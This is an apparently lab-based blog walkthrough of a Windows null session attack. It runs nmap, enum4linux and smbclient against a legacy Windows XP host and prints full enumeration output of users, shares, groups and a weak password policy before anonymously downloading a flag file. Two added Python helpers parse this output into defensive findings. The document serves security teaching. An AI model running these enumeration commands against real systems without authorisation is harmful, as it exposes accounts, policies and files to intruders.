The final goal of this blog post is to show you how to retrieve information from the target machine, such as shares, users, groups and so on. Moreover, by navigating the remote machine you should be able to find a file named "Congratulations.txt". Download it and explore its content.
Eliminate Your Fears And Doubts About Null Session Attack
A Windows machine can share a file or a directory on the network; this lets local and remote users access the resource and, possibly, modify it.
Example
A file server in an office lets users open and edit the documents of their own department, while it lets everyone read, but not modify, public information files.
This feature is very useful in a network environment. The ability to share resources and files reduces redundancy and can improve work efficiency in a company. Shares can be either extremely useful if used properly or extremely dangerous when configured improperly. Creating network shares in a Windows-based environment is fairly easy. Generally users just need to turn on the File and Printer Sharing service and then they can start sharing directories or files.
Users can also set permissions on a share, choosing who can perform operations such as reading, writing and modifying permissions. In recent Windows versions users can choose to share a single file or use the public directory. When sharing a single file they can choose which local or remote users to share the file with. When using the public directory they can choose which local users can access the files on the share, but on the network side they can only allow everyone or no one to access the share.
An authorised user can access a share by using a Universal Naming Convention path (UNC path). The format of a UNC path is:
\\ServerName\ShareName\file.nat
Administrative shares
There are also some special default administrative shares which are used by system administrators and Windows itself:
\\ComputerName\C$
lets an administrator access a volume on the local machine. Every volume has such a share (C$, D$, E$, etc.).
\\ComputerName\admin$
points to the Windows installation directory.
\\ComputerName\ipc$
is used for inter-process communication. You cannot browse it via Windows Explorer.
You can test the volume shares and the admin$ share on your computer by entering the following in the Windows Explorer address bar:
\\localhost\<sharename>
\\localhost\d$
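As an added example (not part of the original post), here is a small Python helper that splits a UNC path into its server, share and path components and classifies the share as a volume share (C$, D$, ...), ADMIN$, IPC$ or an ordinary user share. The regular expression and the classification rules are my own assumptions, written for the plain \\Server\Share\path form shown above (no DFS or long-path prefixes); the sample records are constructed. A defender can run it over file-access records to spot which accesses hit administrative shares.

```python
import re
from dataclasses import dataclass
from typing import List

# Assumption: plain \\Server\Share[\path] form only (no DFS, no long-path prefix).
UNC_RE = re.compile(
    r'^\\\\(?P<server>[^\\/]+)\\(?P<share>[^\\/]+)(?P<path>(?:\\[^\\/]*)*)$'
)


@dataclass(frozen=True)
class UncPath:
    server: str
    share: str
    path: str       # everything after the share name, '' when absent
    hidden: bool    # share name ends with '$' (not shown in browse lists)
    kind: str       # 'volume' (C$, D$, ...), 'admin' (ADMIN$), 'ipc' (IPC$) or 'user'


def classify_share(share: str) -> str:
    """Map a share name to one of the administrative share kinds or 'user'."""
    up = share.upper()
    if re.fullmatch(r'[A-Z]\$', up):
        return 'volume'
    if up == 'ADMIN$':
        return 'admin'
    if up == 'IPC$':
        return 'ipc'
    return 'user'


def parse_unc(text: str) -> UncPath:
    """Split a UNC path; raises ValueError for anything that is not server + share."""
    m = UNC_RE.match(text)
    if not m:
        raise ValueError(f'not a UNC path: {text!r}')
    server, share, path = m.group('server'), m.group('share'), m.group('path')
    return UncPath(server, share, path, share.endswith('$'), classify_share(share))


def is_administrative(p: UncPath) -> bool:
    return p.kind in ('volume', 'admin', 'ipc')


def administrative_accesses(records: List[str]) -> List[UncPath]:
    """Filter accessed UNC paths (e.g. from an audit log) down to administrative shares.
    Malformed entries are skipped instead of aborting the whole run."""
    hits = []
    for rec in records:
        try:
            p = parse_unc(rec.strip())
        except ValueError:
            continue
        if is_administrative(p):
            hits.append(p)
    return hits


# Constructed sample records (not from the post) mixing user and administrative shares.
SAMPLE_RECORDS = [
    r'\\ServerName\ShareName\file.nat',
    r'\\localhost\d$',
    r'\\ComputerName\admin$\system32\drivers',
    r'\\ComputerName\ipc$',
    r'\\fileserver\Public\readme.txt',
    'not a unc path',
]

if __name__ == '__main__':
    for p in administrative_accesses(SAMPLE_RECORDS):
        print(f'{p.kind:6} {p.server}\\{p.share}{p.path}')
```

Running the block prints the three administrative-share records (d$, admin$ and ipc$) and silently drops the malformed line; feed real audit records into administrative_accesses to get the same filtering.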
Null session attacks can be used to enumerate a lot of information. Attackers can steal information about:
# Passwords
# System users
# System groups
# Running system processes
Null sessions are remotely exploitable; this means that attackers can use their own computers to attack a vulnerable Windows machine. Moreover, a null session can be used to call remote APIs and remote procedure calls. Because of these factors, null session attacks had a huge impact on the Windows ecosystem.
Nowadays Windows is configured to be immune to this kind of attack. However, legacy hosts can still be vulnerable.
A null session is a vulnerability of Windows administrative shares: it lets an attacker connect to a local or remote share without authentication.
We will go through the
enumeration of windows shares and their exploitation by using various
techniques and tools.
Tools
The best tools for this lab are:
# enum4linux
# samrdump
# smbclient
Steps
# Find a target in the network
# Check for null session
# Exploit null session
It's time to get our hands dirty.
# Gather information with enum4linux
Use enum4linux and gather the following information:
# Shares
# Users
# Password policies
# Groups
# Use smbclient to navigate the target machine
Mount the share or use the smbclient interactive command line in order to navigate the remote machine, find the Congratulations.txt file and inspect its content.
Find a target in the network
We first need to identify the remote network. We can do it by running ifconfig and checking the IP address of our tap0 interface.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2201  bytes 96326 (94.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2201  bytes 96326 (94.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.99.101  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::5044:42ff:fe4d:3eb6  prefixlen 64  scopeid 0x20<link>
        ether 52:44:42:4d:3e:b6  txqueuelen 1000  (Ethernet)
        RX packets 3  bytes 363 (363.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 522  bytes 22356 (21.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.98.25  netmask 255.255.255.0  broadcast 192.168.98.255
        inet6 2409:4064:95:e81b:3e1a:d593:a513:ecb9  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 92211  bytes 102634365 (97.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 55571  bytes 9521350 (9.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
As we can see, the target network is 192.168.99.0/24 (note that your IP address may differ from the one in the previous screenshot). Let's run nmap in order to discover alive hosts on the network:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sn 192.168.99.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 21:02 IST
Nmap scan report for 192.168.99.162
Host is up (0.53s latency).
MAC Address: 00:50:56:A5:DF:D7 (VMware)
Nmap scan report for 192.168.99.101
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 18.25 seconds
The previous screenshot shows that the only host alive on the network is
192.168.99.162 (besides our host: 192.168.99.20).
Check for null session
Let us target the host found in the previous step and check if it is
vulnerable to null sessions. In the following screenshot, we are using
enum4linux, but you can use any tool you prefer.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -n 192.168.99.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ======================================================
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ======================================================
[+] Got domain/workgroup name: WORKGROUP

 ==============================================
|    Nbtstat Information for 192.168.99.162    |
 ==============================================
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 =======================================
|    Session Check on 192.168.99.162    |
 =======================================
[+] Server 192.168.99.162 allows sessions using username '', password ''

 =============================================
|    Getting domain SID for 192.168.99.162    |
 =============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Sun Dec 26 21:03:38 2021
We can see that the File Server Service is active (the <20> entry appears in the list) and that the session check reports that the server allows sessions with an empty username and password.
Exploit null session
It is time to get our hands dirty!
Gather information with enum4linux
Let us try to gather as much information as we can. To do this we can simply
run enum4linux with the -a switch:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -a 192.168.99.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:05:14 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ======================================================
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ======================================================
[+] Got domain/workgroup name: WORKGROUP

 ==============================================
|    Nbtstat Information for 192.168.99.162    |
 ==============================================
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 =======================================
|    Session Check on 192.168.99.162    |
 =======================================
[+] Server 192.168.99.162 allows sessions using username '', password ''

 =============================================
|    Getting domain SID for 192.168.99.162    |
 =============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================
|    OS information on 192.168.99.162    |
 ========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.99.162 from smbclient:
[+] Got OS info for 192.168.99.162 from srvinfo:
        192.168.99.162 Wk Sv NT PtB LMB
        platform_id     :       500
        os version      :       5.1
        server type     :       0x51003

 ===============================
|    Users on 192.168.99.162    |
 ===============================
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS      Name: (null)    Desc: (null)
index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank    Name: Frank     Desc: (null)
index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant    Name: Remote Desktop Help Assistant Account     Desc: Account for Providing Remote Assistance
index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin  Desc: (null)
index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US      Desc: This is a vendor's account for the Help and Support Service

user:[Administrator] rid:[0x1f4]
user:[eLS] rid:[0x3eb]
user:[Frank] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[HelpAssistant] rid:[0x3e8]
user:[netadmin] rid:[0x3ec]
user:[SUPPORT_388945a0] rid:[0x3ea]

 ===========================================
|    Share Enumeration on 192.168.99.162    |
 ===========================================

        Sharename       Type      Comment
        ---------       ----      -------
        My Documents    Disk
        IPC$            IPC       Remote IPC
        Frank           Disk
        C               Disk
        WorkSharing     Disk
        FrankDocs       Disk
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------

[+] Attempting to map shares on 192.168.99.162
//192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
//192.168.99.162/Frank  Mapping: OK     Listing: DENIED
//192.168.99.162/C      [E] Can't understand response:
  AUTOEXEC.BAT                        A        0  Fri Feb 13 06:20:47 2015
  boot.ini                           HS      211  Fri Feb 13 06:16:17 2015
  CONFIG.SYS                          A        0  Fri Feb 13 06:20:47 2015
  Documents and Settings              D        0  Wed Feb 18 14:55:58 2015
  IO.SYS                           AHSR        0  Fri Feb 13 06:20:47 2015
  MSDOS.SYS                        AHSR        0  Fri Feb 13 06:20:47 2015
  NTDETECT.COM                     AHSR    47564  Tue Aug  3 22:38:34 2004
  ntldr                            AHSR   250032  Tue Aug  3 22:59:34 2004
  pagefile.sys                      AHS 805306368  Thu Dec 23 22:59:58 2021
  Program Files                      DR        0  Mon Oct  3 21:40:27 2016
  System Volume Information         DHS        0  Fri Feb 13 06:24:12 2015
  WINDOWS                             D        0  Mon Oct  3 21:42:49 2016

                785224 blocks of size 4096. 345608 blocks available
//192.168.99.162/WorkSharing    Mapping: OK, Listing: OK
//192.168.99.162/FrankDocs      Mapping: OK     Listing: DENIED
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.99.162/C$     Mapping: DENIED, Listing: N/A

 ======================================================
|    Password Policy Information for 192.168.99.162    |
 ======================================================
[+] Attaching to 192.168.99.162 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:192.168.99.162)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
        [+] ELS-WINXP
        [+] Builtin
[+] Password Info for Domain: ELS-WINXP
        [+] Minimum password length: None
        [+] Password history length: None
        [+] Maximum password age: 42 days 22 hours 47 minutes
        [+] Password Complexity Flags: 000000
                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0
        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0

 ================================
|    Groups on 192.168.99.162    |
 ================================
[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]
[+] Getting builtin group memberships:
Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin
Group 'Users' (RID: 545) has member: ELS-WINXP\Frank
Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest
Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin
[+] Getting local groups:
group:[HelpServicesGroup] rid:[0x3e9]
[+] Getting local group memberships:
Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0
[+] Getting domain groups:
group:[None] rid:[0x201]
[+] Getting domain group memberships:
Group 'None' (RID: 513) has member: ELS-WINXP\Administrator
Group 'None' (RID: 513) has member: ELS-WINXP\Guest
Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant
Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0
Group 'None' (RID: 513) has member: ELS-WINXP\eLS
Group 'None' (RID: 513) has member: ELS-WINXP\netadmin
Group 'None' (RID: 513) has member: ELS-WINXP\Frank

 =========================================================================
|    Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050)    |
 =========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-21-823518204-2025429265-839522115
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''

 ===============================================
|    Getting printer info for 192.168.99.162    |
 ===============================================
Cannot connect to server.  Error was NT_STATUS_NETWORK_UNREACHABLE
enum4linux complete on Sun Dec 26 22:35:32 2021
As we can see in the previous screenshots, we were able to gather a lot of
information from the machine.
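To make the two enum4linux steps above (the null session check and the -a information gathering) repeatable, here is an added Python example, not part of the original post and not enum4linux's own code, that parses the tool's text output into a structured report and derives the findings a defender would write up: whether the null session was accepted, which shares are anonymously listable, which accounts and Administrators members were disclosed, and whether the password policy has a minimum length, complexity and a lockout threshold. The embedded sample is a trimmed copy of the output shown above; the regular expressions are my own and assume the line formats of enum4linux v0.8.9.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: a trimmed copy of the lines the post's enum4linux -a run printed
# for 192.168.99.162, kept to the sections this parser looks at.
SAMPLE = r"""
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
[+] Server 192.168.99.162 allows sessions using username '', password ''
user:[Administrator] rid:[0x1f4]
user:[eLS] rid:[0x3eb]
user:[Frank] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[HelpAssistant] rid:[0x3e8]
user:[netadmin] rid:[0x3ec]
user:[SUPPORT_388945a0] rid:[0x3ea]
[+] Attempting to map shares on 192.168.99.162
//192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
//192.168.99.162/Frank  Mapping: OK     Listing: DENIED
//192.168.99.162/WorkSharing    Mapping: OK, Listing: OK
//192.168.99.162/FrankDocs      Mapping: OK     Listing: DENIED
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.99.162/C$     Mapping: DENIED, Listing: N/A
[+] Minimum password length: None
[+] Password history length: None
[+] Account Lockout Threshold: None
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin
"""

USER_RE = re.compile(r'user:\[([^\]]+)\] rid:\[(0x[0-9a-fA-F]+)\]')
SHARE_RE = re.compile(r'^//[^/\s]+/(\S+)\s+Mapping:\s*(\w+),?\s+Listing:\s*([\w/]+)', re.M)
ADMIN_RE = re.compile(r"Group 'Administrators' \(RID: 544\) has member: (\S+)")


def _policy_value(text: str, label: str) -> Optional[int]:
    """Integer after 'label:', or None when enum4linux printed 'None' (setting not enforced)."""
    m = re.search(re.escape(label) + r':\s*(\S+)', text)
    if not m or m.group(1) == 'None':
        return None
    return int(m.group(1))


def parse_enum4linux(text: str) -> Dict:
    """Reduce an enum4linux run to the facts that matter for a null session assessment."""
    return {
        'null_session': bool(re.search(r"allows sessions using username '', password ''", text)),
        'file_server': bool(re.search(r'<20>.*File Server Service', text)),
        'users': {name: int(rid, 16) for name, rid in USER_RE.findall(text)},
        'shares': {share: (mapping, listing) for share, mapping, listing in SHARE_RE.findall(text)},
        # strip the ELS-WINXP\ domain prefix from each member
        'admins': [m.split('\\')[-1] for m in ADMIN_RE.findall(text)],
        'min_password_length': _policy_value(text, 'Minimum password length'),
        'lockout_threshold': _policy_value(text, 'Account Lockout Threshold'),
        'complexity': 'Password Complexity: Enabled' in text,
    }


def findings(report: Dict) -> List[str]:
    """Turn the parsed report into the findings a defender would raise with the system owner."""
    out = []
    if report['null_session']:
        out.append('null session accepted (anonymous IPC$ logon)')
    listable = [s for s, (mapping, listing) in report['shares'].items()
                if mapping == 'OK' and listing == 'OK']
    if listable:
        out.append('anonymously listable shares: ' + ', '.join(listable))
    if report['users']:
        out.append(f"{len(report['users'])} local accounts enumerated anonymously")
    if report['admins']:
        out.append('Administrators group members exposed: ' + ', '.join(report['admins']))
    if not report['min_password_length']:
        out.append('no minimum password length')
    if not report['complexity']:
        out.append('password complexity disabled')
    if report['lockout_threshold'] is None:
        out.append('no account lockout threshold')
    return out


if __name__ == '__main__':
    for line in findings(parse_enum4linux(SAMPLE)):
        print('[!]', line)
```

Point parse_enum4linux at a saved enum4linux run instead of SAMPLE to get the same report for another host; the findings list is what goes to the system owner (disable anonymous enumeration, restrict the listable share's permissions, and set a minimum length, complexity and lockout threshold in the password policy).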
Use smbclient to navigate the target machine
A very useful tool that we can use to access remote shares and browse
the remote machine is smbclient.
First let us get the list of
shares using smbclient:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient -L WORKGROUP -I 192.168.99.162 -N -U ""

        Sharename       Type      Comment
        ---------       ----      -------
        My Documents    Disk
        IPC$            IPC       Remote IPC
        Frank           Disk
        C               Disk
        WorkSharing     Disk
        FrankDocs       Disk
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
Let us now try to access the WorkSharing share and see what files are stored
in there:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient \\\\192.168.99.162\\WorkSharing -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Feb 18 16:37:31 2015
  ..                                  D        0  Wed Feb 18 16:37:31 2015
  Congratulations.txt                 A       66  Wed Feb 18 15:11:59 2015

                785224 blocks of size 4096. 345613 blocks available
smb: \> get congratulations.txt /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt
getting file \congratulations.txt of size 66 as /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>
As we can see in the previous screenshot, there is a file named Congratulations.txt. Let us download it to our machine and then use the cat command to display its content.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ cat congratulations.txt
Congratulations! You have successfully exploited a null session!
Very informative